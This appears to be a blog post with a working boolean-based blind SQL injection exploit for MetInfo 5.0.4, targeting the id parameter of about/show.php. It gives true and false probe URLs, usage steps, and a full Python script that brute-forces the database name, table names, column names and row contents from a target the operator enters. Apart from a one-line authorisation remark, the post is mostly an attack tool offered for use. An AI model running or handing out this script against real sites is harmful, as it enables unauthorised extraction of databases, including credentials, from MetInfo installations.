metinfo_5.0.4 boolean blind exp

MetInfo 5.0.4 boolean-based blind SQL injection script (injection point: the `id` parameter of `about/show.php`)

Network disk link

Extraction code: dx2o

How the boolean oracle is judged: the page is served normally (HTTP 200) when the condition appended to `id` is true, and fails when it is false. The script below relies only on the status code, not on the response body.

successful request

http://10.9.47.148/metinfo_5.0.4/about/show.php?lang=cn&id=22 and 1=1

image-20231108114457722

failed request

http://10.9.47.148/metinfo_5.0.4/about/show.php?lang=cn&id=22 and 1=2

image-20231108114603908

Using the blind-injection script

Start the script

python metinfo_booleanBasedBlind.py

Brute-force the database name and the table names

Enter the target IP; the script then brute-forces the current database name and the table names in that database. It assumes MetInfo is installed at `/metinfo_5.0.4` directly under the web root of the target, i.e. the site is reachable as http://10.9.47.148/metinfo_5.0.4.

image-20231108115700356

Brute-forcing the columns of a table

Enter the name of the table whose columns should be brute-forced

image-20231108120020203

Brute-forcing the data in a column

Enter the column whose values should be brute-forced

image-20231108132756901

Decoding

image-20231108132849553

Source code

import string
import requests
import binascii
# ---------------------------------------------------------------------------
# Character set and probe settings
# ---------------------------------------------------------------------------
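# Characters tried at every position, in this order.  Digits, ASCII letters and
# underscore cover MySQL identifiers and hex digests; a value containing anything
# else ('@', '.', '-', '$', ...) is cut off at the first such character.
CHARSET = string.digits + string.ascii_letters + "_"

# Bounds kept from the original script: range(1, N) probes positions 1..N-1.
MAX_NAME_LEN = 30      # database / table / column name positions probed
MAX_VALUE_LEN = 100    # data value positions probed
MAX_TABLES = 600
MAX_COLUMNS = 100
MAX_ROWS = 100
# The original issued requests without a timeout, so a stalled target hung it forever.
REQUEST_TIMEOUT = 10
SEPARATOR = "*" * 100


def _target_url(ip: str) -> str:
    """Return the injectable page; MetInfo is assumed to live at /metinfo_5.0.4 under the web root."""
    return f"http://{ip}/metinfo_5.0.4/about/show.php"


def _query(condition: str) -> dict:
    """Query string for one probe: ``id=22 and <condition>`` on the vulnerable parameter.

    Returned as a dict for ``requests`` ``params`` so spaces, parentheses and
    '=' are percent-encoded by the library rather than by a hand-built URL.
    """
    return {"lang": "cn", "id": f"22 and {condition}"}


def _hex_literal(value: str) -> str:
    """Return *value* as a MySQL hex literal (``0x...``) so it needs no quotes in the payload."""
    return "0x" + binascii.hexlify(value.encode()).decode()


def _oracle(ip: str, condition: str) -> bool:
    """Send one probe and report whether the injected *condition* evaluated true.

    The only signal used is the HTTP status: the page answers 200 when the
    appended condition is true and non-200 otherwise (the ``1=1`` / ``1=2``
    requests shown above).  Body and timing differences are ignored.
    """
    resp = requests.get(_target_url(ip), params=_query(condition), timeout=REQUEST_TIMEOUT)
    return resp.status_code == 200


def _guess_char(ip: str, expr: str, pos: int) -> "str | None":
    """Return the character at 1-based *pos* of SQL expression *expr*, or None if nothing in CHARSET matches."""
    for ch in CHARSET:
        if _oracle(ip, f"ascii(substr({expr},{pos},1))={ord(ch)}"):
            return ch
    return None


def _extract(ip: str, expr: str, max_len: int) -> str:
    """Recover *expr* one position at a time, echoing each character as it is found.

    Stops at the first position with no match, which is either the end of the
    value or a character outside CHARSET; the caller cannot tell which.
    Positions probed are 1..max_len-1, matching the original range() bounds.
    """
    chars = []
    for pos in range(1, max_len):
        ch = _guess_char(ip, expr, pos)
        if ch is None:
            break
        chars.append(ch)
        print(ch, end="", flush=True)
    return "".join(chars)


def _enumerate_rows(ip: str, row_expr: str, max_rows: int, max_len: int) -> list:
    """Dump successive rows of a single-column query until one comes back empty.

    *row_expr* is a parenthesised subquery with an ``{offset}`` placeholder used
    in ``limit {offset},1``.  There is no ORDER BY, so the row order is whatever
    the server returns, as in the original script.
    """
    rows = []
    for offset in range(max_rows):
        print(f"[{offset + 1}]", end="", flush=True)
        value = _extract(ip, row_expr.format(offset=offset), max_len)
        print()
        if not value:
            break  # no first character: the offset is past the last row
        rows.append(value)
    return rows


def _database_length(ip: str) -> "int | None":
    """Return length(database()), or None when no length in 1..29 tests true."""
    for n in range(1, MAX_NAME_LEN):
        if _oracle(ip, f"length(database())={n}"):
            return n
    return None


def main() -> None:
    """Interactive driver: database name, its tables, then the columns and rows the operator picks.

    Only run this against a host you are authorised to test.
    """
    ip = input("Input target ip:")

    length = _database_length(ip)
    if length is None:
        # The original fell through here and reported 29; with no length the
        # oracle is not working (wrong path, no injection, or no 200 on success).
        print("Could not determine the database name length; check that the 1=1 probe returns HTTP 200.")
        return
    print(f"The length of the database name is {length} bits")
    print(SEPARATOR)

    print("Current database:")
    for pos in range(1, length + 1):
        ch = _guess_char(ip, "database()", pos)
        # '?' marks a position holding a character outside CHARSET.
        print(ch if ch is not None else "?", end="", flush=True)
    print()
    print(SEPARATOR)

    print("Explosion table name")
    _enumerate_rows(
        ip,
        "(select table_name from information_schema.tables where table_schema = database() limit {offset},1)",
        MAX_TABLES,
        MAX_NAME_LEN,
    )

    print(SEPARATOR)
    table = input("Enter the name of the table to be blasted:")
    # Hex literal so the table name needs no quotes inside the payload.
    table_hex = _hex_literal(table)
    _enumerate_rows(
        ip,
        "(select column_name from information_schema.columns where table_schema = database() "
        f"and table_name={table_hex} limit {{offset}},1)",
        MAX_COLUMNS,
        MAX_NAME_LEN,
    )

    print(SEPARATOR)
    column = input("Enter the field to be blasted:")
    # Operator-supplied identifiers go into the query verbatim, exactly as the original did.
    _enumerate_rows(
        ip,
        f"(select {column} from {table} limit {{offset}},1)",
        MAX_ROWS,
        MAX_VALUE_LEN,
    )


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\nInterrupted.")
    except requests.RequestException as exc:
        # The original swallowed every exception with a bare except; report
        # network failures instead of exiting silently.
        print(f"Request failed: {exc}")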